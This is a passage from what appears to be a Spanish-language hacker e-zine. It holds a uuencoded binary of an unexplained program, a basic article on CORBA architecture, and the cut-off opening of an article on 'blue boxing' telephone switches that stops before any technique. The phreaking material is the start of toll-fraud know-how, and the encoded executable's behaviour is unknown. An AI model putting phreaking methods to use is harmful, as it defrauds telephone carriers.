MY(2N+FYKQPN%*:E<D&I96-&U:S=0\-SV-J&-VRJVM\-WN[AS9^&FMJT0&MN# M(![T!SG`84=;)]?5N2TXAYQ_.D&C]BZQ<WMA]<Z=P1?:8%I'Z'O?4`3BB=O9 MU;4[Q&UKZZ346X-<9S`D``K,'&296/IHP4QLU6C!@?.#Q[`T@_G-__7*P['O MQ%'V:,'K$<P:7L9ON'%L@P883&+^J3=JYH?\XV_X\&D)V2^8,H6TJI*K<FM& M2#\XC)7L;IWCVX)1/F'B]8IA4,9C>QGR=`23,C?>/\(AU1#%0+XJ@\^6W\*2 M8YW(5,DO,OS'RI<.L_!YI.P@5H4,F3?QPW2:\I&\#$?+ZO'YLHWX]`O9`WHT M<20*W^?+-N/3LUED4U)='1G631P)9-P1;YW:@OH1PXX41:L0^9H\[<;$4H^+ M/V#/QALP6<1^%'E.%0I9:V0?2-$S+JS<)!.18;W]0K=;9S&>.<1.'!G\1W;L M'9!2G.?&1=$?+Y[G>``A8MF(R=/5^'!^C<8T9!A\C!W[*1!;K'J$^5LKDBH0 M8J3'"'X-2,\P_*?PE:9]78(OD_;U*_C*1'H5\:>C9<U8GX7XA2=T'\D`UJ&B MX0-61-_Y",4<]@N#K^+1`O)Q;%W^.WF;L8U8FG'QNZ,%UEC9:$')4%VLVG;8 M4$-)\@_BR+0JZBBB*;9IM,!BC91%,1)R/8/_AN4;::]'L3R>-O@^*U]):Y$_ M33O.*$-Q"X(E6R,4Q#.18X6PE%0RCC5B&HRD&6Y/AAQ`OC,MC+P$M39$IM/" M:2<9.90>8FK]%V_L3V1C=5&BWF`QVB]E7!26VZ]ZR;L3/PN(>JD4"4LK2H:> M<:HBXQXPH?%C`!(_BYO1E+$Y$9G.Y%D0,:F,U]F'%+8NQOB\AGPC2=HO]#FX M/68Y"X5TIB\$76^Y<M,8:&U*.-KX=,>+84OAM4DEW=$2UCG*0W^92DAE6\#` M[&$#_,0#2^331OL%^:I!*GL^!8:?N'F)_',*/@_@-@`O)'FM>(!!<6F)?-@H MOV48-@!8*ML.N"4D;RNV7[4/R>.(@IEA`X"C,"'AE7^H#AO\&)&;?8[EHNY. MGA]+93`6;SI>$M<-5ZKF>!`@`8"P<0'?R0M@\,LB\2%RA093=%%/&,<8^7?Z MDJ'>*(BAK!E-EA<I]8XRL<A^58(?W%?1`'LD,XU<`?)?4'(ZOTG^-I(/(45R M.,1E@/^34</_\SQ>7H?D#C3V714V$CO6K$X&$MZZ@2=1QE4A+]ZX0'[#T!`W MH($"),?UY"/_0`F*GU\L]QC\\E$]=10#].`5(,^EY()ACKH'J`?`C:N6R-\U MR/OTU-=`ZSO.D=G:WK5)?KHU`>H\;R0?D"NG$'K+S'&ED"USW\KD'()HAC@* MISF!8BVEN'62E4N,_"(8%QOW.TI+0==#J(KFD(>-(:SL\9);/E?*8S$LG]"! M=1E7_8>R3C`IO3[5Q],TO?ZBT_0*>.J_0;__/OU`-DI-.*J?,^0\G<"A^.<+ MY9_H_=*-+--[Y),6^2V=LO?5P3)V:NPU1&Z1WYRQ87G';&3*)"Z=^)F8%U^< M1U?C!P;)42I:J9XA@[*(3)QY!D>F].(PT)R+3R^D-"T&<F].CRD6]#A1`,Y\ MB.KPZ+P.ZT"'$\O]<AZU0B[1#2"<\97`#B!67J&K4Y_>2+-CCD%^8:;9SV<9 M7M^(Z>8N/EL4-1HG(=K708P:!T^`LK^'^"S'*&E81Z=<T_-F<C/EACZ'663' M/D2.Q\3;,5;NI*H,+$#SNORK#G8>U27&@BXY5&:\/$_^)QVY5ISOQB-ZA%PN M^2>@$Y9_R,[K]`,]_Y+WK177KI56N@/BWT$:V*GG_Q8003V_S>LCR9-8;M&3 MR^0O`RP"GQC<[OY]^XZNO<=_U1J0?SK=[&_BGR(7BPT;\;=8-(!T\E,L6%=\ MSD`-I.9)9>5TSY*\]3C^[POEVRP$HYS-3@Z#A2@1.6^@:Z3<HE8SY&N0K.@` MPK\H0;YBJKSVH:,E7\C[,1@;&`RR&1>$[VKN$G5@^!IJ^'^PY-?:1@0)D7-X M;D6.88@*V`OVA?)^%C:@YF(=R5^/Y1]A9>&K9%9^&I$$I/1B@QL/($9^"8.M MG;K)Q)0R4P69D9XFHAF,B;HHIA$PH,"4,B4734>FTO:P`VEP&IV!$^A:I!1. MMWK6*F\U-9/94"Z9[5?5HT>[S_9.'"'O%">B1O+;R<1<-#/R22::7XEKP227 M#XP[PO2;T='GDV</U:K%-E!&6]3%'O)K:EYBWJ)/&7@3I>7U2IPQ)"RAN)]C M"+=ZBCS#-$N?_UFZ`%;'3^3(AS'YK7R4F4RX?-[3I?C-(P&0XTC)D<ZR("CE MLV\D!O^\'(&![0=L.G)E%Y;;@<DIC+QP&MNORFXV$#*?8I&2=HI!"@MI83-` MGV7)%5X/$CY!<TDKE9\TONP\WV4,K`?P=2^2OV;\LAD8D\OK8<'O8?X)R"E= MXBHXI3*YDXRC4S!+[W.E[>WB(\GWNK>S--<\!&OP(58JR;CT4M(F.L@5)9V, MDRL@=AOJ-YN.TNW`("I]7O0A9D[TZRB5ZW9G@W7RC]!D(CZ4+7<P`PC)+R-@ M',8`NITM>S403T';`53;YU@JZ&#?W9U,>,@52.IPCIF%>H#62#.L:'`\+E0J M"^%$6P#'VQI'J?`TE%P"K96^5>Y8(>8G1TQ73R(Q3W+L$_6]?55*IN1X-JR7 M'*M".)DP7158>6:R5^EM26SV^@RT&B)CTN=9TA0CFD\GLJ*->$`'=8BR7)K" M`!EY`,F6IE@QX_1[`&'HUCQ"1FD`3&4#V0=9T2T/)G(`N?0``A-7P<3+`+D_ M\<LLH#F:!658M)(!FBIIEBIP/&O``!`,D-72+%7@;4K3XV0USK,L0.(/(-G2 MK`XX#V4!$XVSC99TQM;`\XEZ#W'-9`R)J\E[!_-=.)I%7$G6-5/LPN0WQ(W9 MLU'7S(U%%\<B"5U=?0.QRJ.J/VJ,)'#S]3\WM30G\BU66ME:$QYY0J65SE=J M2Z(!)-LOQ4WH[H1T;I7G^@2,3ZYJ,7TB3:\2=#&HG:Z/^Q,^[WP%92.7S[R* M8=="+2(8'3:![;U^^S3!1]Y\DXQ#YN-1[;`.ZL)2J(3;R,<C!BA:U=AS)`_J M7,O+.#*F@VKL'CNY]BQOF_60#\FOCIMI):1SNZNKQX_-1$;8R%GVX+O%%R&( M!*:ZGUD_6A`%X2W]2Y<>/:H5P:DR;C+0FIB"*EJY2\-)YU@J0EY9)DVS$/?3 MC)`9EB&<OE#2(*!T#B[\2>UDHG]UCOHA.0#OST+L6.YMGAW+NCV6>;OG[=4Y M!/Y/K\[I@7\"_V=6YZ#_ZV$"VH^RYM6YQF4[MW4O]\U6V&RZW_Q"4_S7/:[9 MM'3FU!:&="+R,\@6K^E0[#O08*Q$T0-+80A]X`W*7Z])Z4=0M2)DT0;=N56F M2X*!+H\RD4"H1(/*N5J?S'6$N,*N3NB@N]K;X=U21Y=]_[ETU&0:$HS[S^E1 MY)R>PF#FRM1,*VH0^([O!;FVSKW<]X)[N?`.:,RA-]R^UV:S05O40NEC1FU. M2J$DE.(P*-`&?8YT(=>Q5LAVK!0R'1QO$0RF2^*8H@,U;\!I`(3+@0PC9D&# MC)"_Y)+JN\<O2'[P@_3D.?JI4_Y4.^F'8V,:H3:@U*%3"[Z5H]'ZO#&U#S1/ MAQK\H=[D^^(X/<=:3ZI/?'KH>=6?Z*L&Q!\@.>1XR=L64`4)>DIV)Z!D=?]9 MNKF*MTC)]'"ZZILT?2'^IW*VMAPD*A,([=!4>@)4,B#HB4N:D+_>FZ\U;]V9 M567X;2LRW1&+ZV@OZ,!-85W/WRC+#;[#AI60H^WJ`)+&CQT3IW]![K8:#^>O M1(J>FI*CE>G@C'1PAJ;)36N@V0\NL&GRMJ7,RA]0$=0&Y.+Q%>/'BB]^A_QW M:SV=;J*VSAE@I;.J-`\WU/L,AR$N["KY'9F@O8206S(TH*KCQXIH_Z"0NP;K ME+*$_O1!.38M@1\4X,5#]/-W:R>-K9H.VQB$3*@C=W?VLMQ?YD)Q)D/PT*N3 M4HA99Y,3PI>*6]^VG=O6M6M7&[3[<$V@->[T,L!L0O3.PA\-9T7W+2`_-D$L MZ89=3Z)A(R+WH.G-$D,>K_V2]!*S1C1WYTK7KTE_7/=FQ)4%'>T68=GQ+;U> M<C?F&BT(@/;KH/EQ2_^@;A%80-B'^DIM-M$R>WS+0`Y@(!VXE#_U=G_FV"*R M2=>3#B3^SDVNS$**.FX#I,A"<4ON!5J4%=*^)Y&81L)9JN].**TG_)#JNZW\ M_4`U35-[YM/4<5MO3]@`6?7-(Q!!'F\]&0>'-P=:0J;(U[KK8TGCV%HU`L>& MO2=LB_R1)?<HX<`,J#+L5#D27O#,)C7,=F]2)XX,Z\UP<(X4GSM4J:J^<26+ M[%O@3II]E.5D:U)/7>V\O]PZS<-^CS=_4(?(!$BMOI%!U[G0L5:\JXSW0;08 M8<CV*K<MUJ+['IFT!EKHIIA,[3,=^F7NO^1JT4.2[F[H@O/K@)<-1#99#\&0 M2EU\7ZJ17DHUU#DK_(/&E%2*WYL*)QDNGBHWU]0TPY5)5<5Z#?A78W^^(0J) M"9+_W:J>Y_K9QT<+>O9E:[^!5DN/+]MCZ5GDL?AL!.*RCGS:CS:2RZ,%D-)L MD-->>>_>X8]H8IN>,5IC-:,%\PH&-4MV9Y]8*#_\X+8J=8ES__(&XLSO(]/V M2ZFC9H\%FEQ#X37:W?:NO_X5>1?VP.G%B)UM4'W3+0$>#D.<<4=@HSC1I(9Q M@GRB^FC62=<,LP]EZ`3LKP/`8QK`"]7X67*-3$=&=+".OWK&+.I=L*4RZ2V( MCK4J7TXI#'2)"*6.`4@(F]0U-:IH@/H=IQ+:0@T#C>92.-(NVR_$:N',TT5& M\B?OIT7[$/FX>YFDK.(72-/IX<Q!.&>O\WHV4:7(SX`[@/`7]W.0#?W_'K^7 MA!FP6=]MA"`,]/A8JHGT#PP2,F)NT$7?XRM0RH:=#$KJNY^BN64MN5SR1<J= MSXDX>=[QA'@K>5[YJF3H0*5ZR`@U6!:0,W.VO-/CRX_^V(*B8092,VU^1ER0 M/::4<83<J2@RP&GU+*R^6&XQ%KV>A\B'=1L.#Q5)90C5&,6516OS\I#X^X%\ M!$#6P*)U\T@Q&W"@J>[Z'Q3].GK@&6EL[`+^!C29MSN;!C!=*S?<)':UPQWC MG@Z^JW-7L%.`J[RV;301P1]<-M;!40K[8>3`^4./PFZXT[390,O*`MAI8'+( MV!/F+%:%C=S4TWUBL?:$'X'?,9:!_&N_Y"7)/C![F8,3%Q\O]?72LF8:2H:[ MO70[]BF3K<HC\+4$0`MI",(]"X8PY/;@Y'!O\MSU<X%#/J9[N.0.'!3(-"06 MY=L.OP99^D[/OD=>N4`EYGL/_X;<I5\!*^1D4;&.'41DV&632KD0M@_1'=Q" M[W=XN+*:A29J_)C+Y9O1/N!@@?7J-7TFZ+H_4^ZX+58R#BN^P?#*$'4SL;$( M[L:^K*DQVH>Z74QRB!U9^TXHO_O1M;.AQ7U01HNF!TJ#1>(?>I4,R'T6\`H& MC8S/4Z>7:VLY<B`;+IYI(/=C1X8J0'C0VTSR,7QG]./U]DL$KM;XQ='7<E!# MS!EG$!1F,`?Z!7^L2BL,'M8814X#(^&A6!5Y3<-"W5!&8))&4C0G*U>3E:H3 M\Z('\E!=S&F_2CGFPF:;9[ATCB%0"SFQ*OL%\EKN'+^\%#]C:A->CI7#\-7_ M`5!+`P04``(`"```2$\@6];@A+,4``"[%0``#````$)!5$-(15A%+D581558 M>5A3Y])_SYKD9"6$M0A'&C"`C0AJ50(-.R"0D+"C(*O0(MKD'*G>WGH04.`` MQ;7V\VDO*J(WHG6A7H&*"`JNO06OK=:MVNUP3VM;L`HBY%/O]\?]YH_?S+S/ M._/'._/.S#.G&^=V/W<,.6]=Q9Y_(PKQ^=W.3G3M`[WO0\_'#[`WCZ/7^<9; MR"US\&WS%1ED7)88GQI-1JY9:]&2\Y<L"2*-RS+"3=%D?$6AE@PO+R=-9:M* M*2MI*K866]85%R6OH<CBBC7TJE)R=?'J-9;UZM-`U)T'79M]C6R99B<,AMY> M&!EC+P^/CA]XON5I3,Q9`!W9V:T`?%#+D9TG%'S(*]2]PO!76/@*BUYA\2LL M>8D68=OPKPG48^M$\*7@VR_%L\/77[+>X>NUMRF7EV+7\'5F"K>(7\@T^M)H M^+JVX4,/B)DDJ*7!MZLG8<KWY;V/+%XOV:[_.-CY'[;CI3%L]=0VG)T+=33< M3&>?!HR/M^7R=1WP1>8&T-GI+_C@_W+-3`DM(_]/=['T_Y=>]?U]L/D^WQG< MA_<`R,S>9"^R7[$<^SL[<04!,(%BX!7A`J$(@@%`4`P'_T<OC@BQ1-H"P.A5 M6$KDO(A)Q;IB"U6L`61)63D6$9Y*EE60T6!W9C2I*?1[&:V%<X$>7T2N(`EI M3G1Y?H$VC=I+^)=1Z^<B\1D86!*01B;2A67Y%6M(,P%,*WS4[O$QP!2=!&)` MJL$$HB/C#"#6D(I!K9KX5&`,3S-'`W.<C?"6B-#(\&V;$A.=4N,PDR')&.7G M$`62$!/2>B@RT0RBXL.CHF=OVI>4#-*C)>F&UE9)9&IJ%A87:02J!*%Q6:3! M*(]RLH43J?%)6%&23_A*KZ6^YJ1EN"D)CYA?'!F^+"[<9U>6^2_1IBS-EL3W MDL*3WP4J0`I)Z181(V$)X3.@E$BE>LE#\1Q)"%XAMJ6ZB=_8:UJ<!BU$+YE3 MYT62<SX`T+0<0!2PVX$`2LU-RC7FJ>?;;FMG0T`>%(C)&U\#Z`*M#5G+P)"4 MB+98<-4:2V,Y6@Q4I#JYN+B(C#*8R:6!(B/IMLI2G$\56]1,E9]Y?065_][2 M'G?7R2Z@N521O[I86_P>Y46FJ2/S*^903A7Z^8?1M;283*TRKA'YOOH.IA/^ MJU/6*Y$TB"2M:XL+RXA[^VBUV;%L@V8Q1JV94U"V2OV.\[K(]L(U)W:L7NN] MJVA'?@3L19>42$KH\G*U,2@QOZ"XW*5X8W!:7VE$Z=8''_17%!;/.N`/56PK MV7J0J%?'+RE>E?]FF?4=SS:HWDB6MY9L7&LE"R.T3D%A"XNMU&N0YN=N!.H4 M79O]O#/P1;)M/M]]%&:>PY:T+QI?ZTSH(0!0J/96PPA>"^\WP(MJ.^,<NF?( MA?N37(#<XK<_`^YE0/`E``@))8P)NLWEB:U8]R#,O[!K0'7S*`%WG+!@/-[- MM6K@T?40N\C`AB4R:-40">QX/3PO4&Q1$(`[4JG3TU`,MP&RW`1Z_D>=E'I0 M';8%ME-BSO(Q>&OP3?XZYP'7AQF9%/A\V+)W5RFZ,##>9C,I)(HTH%),R]G$ M&?N"ZD'4*1<`\1/ZCS/+P6D`(4.^]3'`IF%_"Z=8F:Y5'_`E<J['+'9!KE>_ M5165JT:\JC>68%#L7M7*1^SX6]C%!GV5`94)SM8A\=V;D-$+;0TE`<YA<;M< M/S*9-@.S##NU/BT>;O9,2K.:MCW0O+'[#9G7IH2/8<L?/LU^J?XPP!`A+O19 M#7U[AQ`29<M&"(*X2&"8A+`#2^^U+!BK39"+G(ZCO[A@9G3IX&8O@'NF`+Q3 MMZ>[!;XVF[UIM'7J/2\X_ZFMU:CF!UQ6>G6&84&,J,_8&:]MQI->]]P"!Z94 M3]EIU"VS,[$6QG95A]6SE,K4W0H^@;GOA7NEW)BP^RH"2.X;839W1W@,XOMZ M9`!@)Y=2LWNVZGPHC=*=C8)DM%#&/`=Z<IV8RP499[,AS@WDF<.A%<)*X4F) M562%D@'(&?Z^:D`!VUT&4G"9('@$,.)ARCOX=CI[>;P]E\:8T'V:=>Z1GRZ. M;E&)($/7D[&CCO1W/:TM4C`IR!I(D%@0@!5.\&/&X#X>N0!EI!M5N*>`G?FM M0U<I!8"3`RM*_$"AMG#^D2`W#QS*'-#E6T2Z#94R]?V%^X`HN[(SW/KGY`"C M%(4M?Z`8Q`4]N6[$9:Z7O<3=QEU6?)SF(J#:=[@<=#GODL^87)Q8YSRX"W)C M6D^X-0NX(_@<E[9]'D4>;AX%,&&^N),;`R[0`11SJ9\_D,YM/:"QRW)D[*,V MXTYO&GWB+%D(6A3T(]W[M'XPRB[M*3YQ2)FKO$O!),$0KBZT(_M-N#&IWJ6I M$M;?&.7N84%]-M.J3B@'*D\'?(HN+"&"]I4R`K@CTBS<J98(%_^$SOMLGCZ3 MFP=L+5R=_^LZVJ-\'OF+@/R0Y+`(O5<9&%UI9^!X9#3+/I%[TM@U'[QXY=N4 M<T^J`[<?-_?@H&LV#'Q[,/9Z3E<0Z#GORM5"32/<8<S/+0X*=)ZW/4<UC\*U M3030=L4&NG$K\1&4VSAW^=R,8R0+_CZ=;`N9L4SE#7RX0J7_\,NM9P`X(B7) M4%>]5G5$0NHH6JHHBZL41GN'P&KO/TXB7)#`XJ((:"D65.E"0SMNQ&A:HUX3 M6&%^7?KBUM<S8H,Z+\+_.H[>VYY3)S\^IQS:?0?K$>Y>U/TGNCO7E`(%5GFM M"NQ2@/EWV^]=.C^?A,&E!T[<1U@.\[V<N,("_;?9W!&47]_2'89,CGX*PJ'W MV5MGM;&ET]63!$!H]_%VVKG'U5GCV_P!SARAO0Y9F0B<=V''SRZ&U1@]V%^C M[N^9<E)GX^RS/>JZ2:3N^.R5&Y(<:^;X[*[1UQSWSN&<@6J0"T*[`"S^E4($ M2%\@YX,:[8N6>8)_*7%NU?.L'(L<WZM0Z.\&G/.M%P@FC(I'^C9!M]^AXT=^ M:@T/K)+-X/K@^YA%RCY"@*!#)Z61T:]:$X%.0S_NS*Q@OZCI<@"->]"K"1L: M/1H=54JJ)]R9J_F?^P09X!DV]**BQL9R'[$9.X:V(CL^@/3Y[Z<?\;E_/S3* MD$N_>VB;H%SY-J%Q*Q84IF>P,R>U`,K&V*_9/[N0%ZV-P0V&TQLW'@YY9ODU M+Y?;/07O^&>F92$['(`GO^$?-WLYRBU$[EW-"NC'']S?W'HWO)-UCM`K6EJ= MN,=($Z=0NR(3@P_!0/5Y?*5W&__'$XC]+;YF`X\J+1L8F#P&Q:0']QT.^H&K M@B'G7W.[BQ'Q)6IEG'D>C4XNG=R7M>WW&_6G]075_?"VHW!@E+,DV.&$M0JI M8N!"E/54<]M?5/E\IQ9VFEL$V(&TM.M?Z+K4JLGWX5\JT(F!YN?Y`S'N\>W) MM/1:?:Q[ZE78O6K6).<[I7E0/2E<=TG8[]!\=M/]ZE"9YEX*XL45$%E9!+"J MT--V^^'##>=LXVU,-WLA8*!>P-X-RV2^?/LD5.\9!2>KH>NQ&7?;H--2<)A9 MOF+F7%VR/4#;U-I^P]7TS?V!CVI&[D`XRV?OW?3W$'$?Y>9Q\#+J49,RZRR4 MQ<09'_S.7'K2<US)-1LQX5WN,$3EI_>&QLV!#[3EENI*F3'].:1L@?DSR"VG ME"("2J6QJK^7J;A)KB3Z3!10I#<'W^8,H`')M4K/((`7GEG*(\9XES3G)<C6 MY;<M6,&W8`/W>>L3_TPDTR/3D0S*-+APOT$YG-2!R6*_COCC&6SQ-]:DKJ$# M74"[Z"2DJZ"DS%42;`XM*:%GS5QI*$((4.Y8\Q7,1['ZE#'F_1DMK;/RHITJ M"5Y9"&X1D6\?EN_LO?/!7^H@CX2_[`6_K%7LT]SCMH,-/7WBM+BRK7U<+<@R MW:J$'1\[IK>CCA;'(L?D#IU[Q`X*?>^IQ$2(W[D1ZW]12J4X)^T`#Q`:U_E1 M4;Q3?_B(P_VENE!J41MJ#9I'O1$.@,Z']IP9(FZ?!+0SH]M(MQHQ6T<,+R&6 M5&*M``NTPC,#'A3"/9^P,5MY6_9`6GK&BQ%5QHXR#^3,)$1+>P?D]75QJ7`7 M6L=[QZ]0PLHAH%0XC2@9<>\5):20[&ECKVU+@"85<[YT6O[1!K"$5(X`9<+D MDL`E7RNW1RWY4:X^+(\HV%(?!:ECF&E_OZIC2EP)WUB@7*"L.G4\7MT4C61/ M(\HS<3U`F3V-9O^XH"\[*ENK!-<%>;DK!E),;"PP/A?WT0O8*UL\8^%Z^0Y8 M/H,H`\3L+=:@`3!RKE[ZO<OP:/4`:@1$BIGUXJ[9<^H%,C@+O/[P]\SLK`%/ MF1?R^K=>`R9NW+X)_?>O]NP!\X;@D1<#D@@\'6?Z`TT/QQ4G`[.9..);9BJ0 M0CO[MNL>CN4,9*0S+1%:]NNS+?"I.M!("71:"K&!B(>/>UFX[<`!=BR\Z)D% M)`^BKBGZ4"*?O3F$%RD^MW>^Q3I_[,W):B-'4:6^^1DR$7+.HIVNVCK\%7OQ MV(NF2:`&0WS\V-'GU4-(]3E$"&^Y'#`<34'QIR&?JHCY]7_-/NWN?OAP6C.& M[AN:R,T;F`P4QO!/#:C.?6\"G>GQ#T0AG)B"*$DEYYUI^($7IH`=L\C*;Y,G M!DXO4-HMFU$5_IT5&54]MF#RUK;'HY+'3:<<6;1WFPEI0EGT[&@Y`IPA*%?@ ML9-?VM*53Z7\;;>G0621$H+LA^8U)=2,P$7ZPR?NSQGCF>406P'8=JW"Z5,4 M=";DSP5%5/UF=WE[DO#[E5C):?##B5,"&81(&U0QQ`B%:_;\C1\?4`0Y<ZH; MU1JRS$JJ&WIK(]1(90F>;02VIU7](I!)]%$"T;\24ZI1U=(YK7.7>@$S92E[ MQV;KW?.90$^AE:7%%>2A4H^B]5K(=\HE.[!3L$#ELW6&70VDLZ4=.AÐ50 MK:D*W5Q*HELB^R2<V$N/\NC![PU9,C_O.4;P$^1@YH0Y02/VC&>6/M1AYLL/ M1#/]8I3_);E_YT3.FU.>^>@B?Q2<<7A#.3<C+B6]T][1+6(>U#C:9J[28R#Z M8MY)N_^=NA7V!1WQ!.;V\RQE.GNJ7B1C`87->9++M^KE#;\SCP*;F1E1I0B* M6S5!_$!_SI]+#K=<WL6/YY1N]X\R;,>!*B@S?^'JE'3/,ZU]#9*8,/C40^() M'6#D@$0'9U:B34S@F[PWGM&,SVT#(-C>!9BQHT?IJ<_8IWF"Y@N=GDX\=D69 MH#\H%:VLEC8\\LK-RF%^1;1K"VOJOO'LL@,CX\$.'_.)"1A.8/^9EU)V[RWB MEW;LG->BF`+%7'-*!M[L6NFZD[W'CB=2*O_BVBA[J&\JIN=K<:_)]CC>3="! MMGTXQ0CY1`MY;,;R-'E"D.<':@HAE`!EJK4*#Y6WZ(3J$ZXY)30D5#+<'SNO MS0Z$JG_F5Q2M(9.%Q8'/R*@R,N8?KIOBWY8\D.H`T9E37RFOW^C`[I)7]X-] MZ&#L?#`H`.PS!/PIIZVF].`1YGUH*0T4+[*&>7B?^;?^0'6L?%;KR'+*X]AR M6[J^87]G[+79N;UZPF?:P/S5[H9`*K?@OHY0K9:634NZW`BENSR6_T5ELS5\ MMX1&9HH8XS!]S\!^,[W_A/<Q[2PG%^-=.C>;]V$V:IA-M)#=:<]X8A4V53K" MD<+'_%^ZXD.S#ZX[F."ZT.:.IQ\X%]$6T9["CNFA=[/T5J+Z-Y19^W!T1C`: M8J]^$UL8/$=;_6\D)U[CU_6<'8RVD[GZ*H?%B?9*I`$;;QO$I$+]DJ&`_KHH M.Q08/<;+V8T.AAEI1GZ?>2)O!GLG6B#^#6WP+LBQ>G:+V?'Y8%W\]V).K0M1 M[*"?\F,=6@$6)F_G'\N\?(V1R@FO3SQ,3A.EQX2Z$ZIMJC!VQC"\O0'W-"J7 M)&JMF5YU\NG!=:[K!.CBG69C=&1.M^!@]3IR?0%LX-9'I24ES2_("HZ)C*@4 M.F&*'$^\7HI\//TTINDM1GH:\;LVNVFC0IB;)]/4-F4H3)@+FJ%E2?UN(WOG M-%C&?EWK['%=6;%2`QJO/&N^?FO*^-ES@5=GDNO>8FGGY;6*XT[<:V#4]>C9 M^1?."#U*<S+8J>"19.J==3+763_BZOOW;(I]$0]_92^CO48%CTR;OYG*SK5` M0`J+GU!(/3R0:8^65F+LMZZ?0^M$MX+[Q"@%CSCG&!TT#NE8;?,Y]GY^]1`* M%!<O+I;26&Q!HUD"AG$4\>)_G.2A&P]\_?<R`H=$^](D.XUK9'WPY_N'G=P= MCY:Y7_]:F.'=F?P8?3\]Q7/"!3#OL3<;/!@^T.+`3(DJ)=U"4/K0@B$#,3P\ MRBV6^WUF[J[1`C64X^UPH1)ZC#4(:D2UN4T92`/S5ZB%`)2XT]"(.<[F=P2% M#48[S*@7IKZ[/.10T`]ZR/#6T,QYG3^--?R!\[\&]6V.J!/$C=3(YT%'F*L7 M])[UNV2@GGAMU9Z=QNFAV+`=U9/\&&;HQV+PHTL`F*'#90+?O<Z`_<H8U]RG M:O5EPCR2!/1<WQ!GHTA%_]3U;R<$1W*#@'X6K?"H>F!#'_[,8WK<YP^!Q^J5 M>.!B,.&\5G&.=.XP)!1`:TJ*UI59UMCT%:N%<NO:_,+BP,+92)5BM3&?*E4H MX*'-Y^OFR)YDIKTNQC-FQX.WQZV"IDI2YL6[FI#J1YC&QT&LF"4<12!<S02/ MI+,S'4\]&`<=2;L>"\VP11=],Q7\U"9L^;"#G\CC9XVL)-P<G:H;-Y6^6&MM M(=?!,X.VF?Z'_;EU&5!#3<!@T!,_X$=*:%]/;?.G[4^:=O=MG-5XR>*9WGR+ M?:J6$+E>.V@>$%ZC6P`[&*ME0B_#P9&-??W9*8G?6?9!)Z>CQX[&QF:$Z)Z+ MLHS@&/L=A39\QS^)!H9>=FPL#L?)QKY5K!8!)1J/'Y.2!'$`-,1",WW(4,@% MJV?#G)!IZ[ZO7#MB:<*Q!GP^0O]LX\5$W'.9,[P-GRM808>3IZX.;5:L#R<O MG89U8CNUV-GK2U,X>U,B=HP('F&O@AR+:_VG2F!6^'5&]T#@X_T%"P)S.F.B M][B]%E_=VW8SGG)4L9\ZI'DN#A.O_L?"UWW+57\M*M?4%CC'.@/CBW5K^AF3 M^Z9';2GN*5I*:;NC<HM3)6\Q.AL%Y,+:KSO#Y2WV_P502P$"%``4``(`"`!1 M32T=\W]J_M,2``",&```#``N```````$`""44RH`````0D%40TA#3TTN15A% M!P`J`&(9\-+)^*811XN?C+`NT]FB/;<HKC8U6EO6),$C^D'?S5MNT+=>)IJD MV5!+`0(4`!0``@`(``!(3R!;UN"$LQ0``+L5```,``````````0`(.-I[?T2 D``!"051#2$5812Y%6$502P4&``````(``@"B````VB<````` ` end ────────────────────────[ FIN DEL PROGRAMA ]───────────────────────────── <=Yo-Soy=> varf@bigfoot.com <═════════════════════> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ CORBA - 12r ]────────────────────────────────────────────────────────────── --------------------------------------------------------------------- ----------------------------CORBA------------------------------------ ---------------------by 12r43l Overdrive----------------------------- ---------------------12r@antisocial.com------------------------------ --------------------------------------------------------------------- Ya que CORBA es una buena alternativa para el desarrollo de aplicaciones distribuidas y absoluta contraparte de el modelo de M$ COM/DCOM , en este articulo se explica basicamente que es CORBA. Olvidandonos momentaneamente de la historia y en terminos cortos, CORBA es un estandar de computacion distribuida en el cual un objeto es una unica instancia identificable de algun tipo de construccion que provee servicios que pueden ser requeridos por un cliente. Un tipo se refiere a enteros, caracteres, etc..., una constuccion de tipos son estructuras, uniones, etc... Una interfaz es un conjunto de servicios que puden ser requeridos o atendidos por uno o mas objetos, ademas una interfaz puede tener atributos. Los servidores llamados implementaciones de objetos proveen la execucion de los servicios requeridos. Arquitectura. basicamente la arquitectura de CORBA se puede expresar en terminos de tres componentes primarios que son: El cliente, el Object Request Broker (ORB), y la implementacion del objeto. El cliente solicita servicios del ORB, el ORB localiza la implementacion de los objetos que se requieren para satisfacer una peticion en particular, invoca un metodo de la implementacion y regresa el resultado recibido de la implementacion al cliente. La implementacion expone metodos para ser invocados por el ORB, ejecuta cualquier operacion requerida para satisfacer el requerimiento y regresa el resultado al ORB. El cliente solo conoce como accesar al ORB y pedirle un servicio, no sabe ni conoce como trabaja la implementacion. Cuando un ORB recibe un pedido, el corazon del ORB es responsable de encontrar la implementacion de objeto, invocando algun metodo, pasando parametros, y transfiriendo control a la implementacion. Un adaptador de objeto provee la interfaz entre el ORB y la implementacion del objeto, el ORB soporta uno o mas adaptadores de objetos. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ Blue Boxing en Argentina - Dr_Format^ ]──────────────────────────────────── _ _ //_____ \// | ____ / |_____ _______ ______ _ ________ ____ / |___| |/ |/ /___ \|_____ \ / / / |\ \ | | / \ \ \ / //HCK \ /__________\ |_____\_____|____\_____\_____| /_____/\_____\ _ - --------| _|__ - ---------------------------------------\\ - - /_____|_| \| | _|_ |_ PhreAK nota por Dr_Format^ especialmente para Raregazz |___ HACK THE PLANET BoXIng ArGeNtinA! El BLUE BOX UNA FORMA DE PHREAKING Que pasa cuando nosotros llamamos a un telefono? Cuando nosotros realizamos un llamado al mismo switch (ej: 21-2323 21 es el switch) el llamado no sale de la central; si el numero que discamos no pertenece a nuestro switch, nuestra central le envia una serie de tomos o comandos al otro switch. Cuando cortamos nuestro switch le indica al otro que debe volver a modo normal. Que pasaria si falsificaramos el corte? Podriamos 